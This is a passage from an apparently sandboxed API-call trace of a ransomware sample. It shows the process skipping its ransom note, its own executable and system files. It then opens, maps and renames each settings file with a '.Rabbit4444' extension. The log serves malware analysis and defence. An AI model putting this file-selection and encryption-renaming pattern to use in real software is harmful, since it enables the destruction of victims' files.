dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x298 [0059.677] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x70000 [0059.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.679] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.679] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.679] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.679] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15098954516) returned 1 [0059.679] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0059.679] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0059.679] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.679] CloseHandle (hObject=0x298) returned 1 [0059.679] CloseHandle (hObject=0x278) returned 1 [0059.679] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms.Rabbit4444") returned 192 [0059.679] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{efacecba-bccd-468b-bab3-7ca40a898982}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{EFACECBA-BCCD-468B-BAB3-7CA40A898982}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{efacecba-bccd-468b-bab3-7ca40a898982}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.680] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x575504f0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x575504f0, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22145f46, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x389, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms", cAlternateFileName="CL60DD~1.SET")) returned 1 [0059.680] lstrcmpiW (lpString1="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.680] lstrcmpiW (lpString1="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.680] lstrcmpiW (lpString1="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.680] lstrcmpiW (lpString1="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms", lpString2=".") returned 1 [0059.680] lstrcmpiW (lpString1="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms", lpString2="..") returned 1 [0059.680] lstrcmpiW (lpString1="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms", lpString2="windows") returned -1 [0059.680] lstrcmpiW (lpString1="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.680] lstrcmpiW (lpString1="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.680] lstrcmpiW (lpString1="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms", lpString2="boot") returned 1 [0059.680] lstrcmpiW (lpString1="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.680] lstrcmpiW (lpString1="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.680] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms" | out: lpString1="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms") returned="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms" [0059.680] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.681] lstrlenW (lpString="Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms") returned 64 [0059.681] lstrlenW (lpString="Rabbit4444") returned 10 [0059.681] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.681] lstrlenW (lpString=".dll") returned 4 [0059.681] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.681] lstrlenW (lpString=".lnk") returned 4 [0059.681] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.681] lstrlenW (lpString=".ini") returned 4 [0059.681] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.681] lstrlenW (lpString=".sys") returned 4 [0059.681] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.681] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f025b6fd-d1ca-4a32-9beb-dbef1d2f6926}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.681] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.681] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15099213430) returned 1 [0059.681] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=905) returned 1 [0059.681] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0059.682] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0059.682] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x690, lpName=0x0) returned 0x298 [0059.683] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x690) returned 0x70000 [0059.683] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.683] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0059.684] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.684] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.684] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.684] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.684] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.684] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0059.684] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15099468287) returned 1 [0059.684] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0059.684] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0059.684] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.684] CloseHandle (hObject=0x298) returned 1 [0059.684] CloseHandle (hObject=0x278) returned 1 [0059.684] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms.Rabbit4444") returned 192 [0059.684] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f025b6fd-d1ca-4a32-9beb-dbef1d2f6926}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F025B6FD-D1CA-4a32-9BEB-DBEF1D2F6926}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f025b6fd-d1ca-4a32-9beb-dbef1d2f6926}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.685] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x575e8e58, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x575e8e58, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x22145f46, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms", cAlternateFileName="CL1496~1.SET")) returned 1 [0059.685] lstrcmpiW (lpString1="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.685] lstrcmpiW (lpString1="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.685] lstrcmpiW (lpString1="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.685] lstrcmpiW (lpString1="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms", lpString2=".") returned 1 [0059.685] lstrcmpiW (lpString1="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms", lpString2="..") returned 1 [0059.685] lstrcmpiW (lpString1="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms", lpString2="windows") returned -1 [0059.685] lstrcmpiW (lpString1="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.685] lstrcmpiW (lpString1="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.685] lstrcmpiW (lpString1="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms", lpString2="boot") returned 1 [0059.685] lstrcmpiW (lpString1="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.685] lstrcmpiW (lpString1="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.685] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms" | out: lpString1="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms") returned="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms" [0059.686] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.686] lstrlenW (lpString="Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms") returned 64 [0059.686] lstrlenW (lpString="Rabbit4444") returned 10 [0059.686] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.686] lstrlenW (lpString=".dll") returned 4 [0059.686] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.686] lstrlenW (lpString=".lnk") returned 4 [0059.686] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.686] lstrlenW (lpString=".ini") returned 4 [0059.686] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.686] lstrlenW (lpString=".sys") returned 4 [0059.686] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.686] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f0e02d62-6c1d-4eb3-ac47-f8401425c6bc}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.686] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.687] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15099729091) returned 1 [0059.687] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=994) returned 1 [0059.687] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0059.687] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0059.687] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x298 [0059.688] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x70000 [0059.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0059.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0059.689] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0059.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0059.689] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15100001689) returned 1 [0059.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0059.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0059.689] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.689] CloseHandle (hObject=0x298) returned 1 [0059.690] CloseHandle (hObject=0x278) returned 1 [0059.690] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms.Rabbit4444") returned 192 [0059.690] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f0e02d62-6c1d-4eb3-ac47-f8401425c6bc}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F0E02D62-6C1D-4eb3-AC47-F8401425C6BC}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f0e02d62-6c1d-4eb3-ac47-f8401425c6bc}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.691] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x576817c7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x576817c7, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23052c93, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms", cAlternateFileName="CLB26E~1.SET")) returned 1 [0059.691] lstrcmpiW (lpString1="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.691] lstrcmpiW (lpString1="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.691] lstrcmpiW (lpString1="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.691] lstrcmpiW (lpString1="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms", lpString2=".") returned 1 [0059.691] lstrcmpiW (lpString1="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms", lpString2="..") returned 1 [0059.691] lstrcmpiW (lpString1="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms", lpString2="windows") returned -1 [0059.691] lstrcmpiW (lpString1="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.691] lstrcmpiW (lpString1="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.691] lstrcmpiW (lpString1="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms", lpString2="boot") returned 1 [0059.691] lstrcmpiW (lpString1="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.691] lstrcmpiW (lpString1="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.691] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms" | out: lpString1="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms") returned="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms" [0059.691] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.692] lstrlenW (lpString="Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms") returned 64 [0059.692] lstrlenW (lpString="Rabbit4444") returned 10 [0059.692] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.692] lstrlenW (lpString=".dll") returned 4 [0059.692] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.692] lstrlenW (lpString=".lnk") returned 4 [0059.692] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.692] lstrlenW (lpString=".ini") returned 4 [0059.692] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.692] lstrlenW (lpString=".sys") returned 4 [0059.692] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.692] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f120b10e-c882-4613-955f-b4df13c6e803}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.692] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.692] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15100298700) returned 1 [0059.692] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1004) returned 1 [0059.692] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0059.692] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0059.692] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f0, lpName=0x0) returned 0x298 [0059.693] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f0) returned 0x70000 [0059.694] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.694] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.695] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.695] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.695] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.695] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.695] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.695] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.695] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15100568571) returned 1 [0059.695] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0059.695] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0059.695] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.695] CloseHandle (hObject=0x298) returned 1 [0059.695] CloseHandle (hObject=0x278) returned 1 [0059.695] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms.Rabbit4444") returned 192 [0059.695] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f120b10e-c882-4613-955f-b4df13c6e803}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F120B10E-C882-4613-955F-B4DF13C6E803}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f120b10e-c882-4613-955f-b4df13c6e803}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.696] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5771a132, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5771a132, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x232b5237, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x338, dwReserved0=0xa0000003, 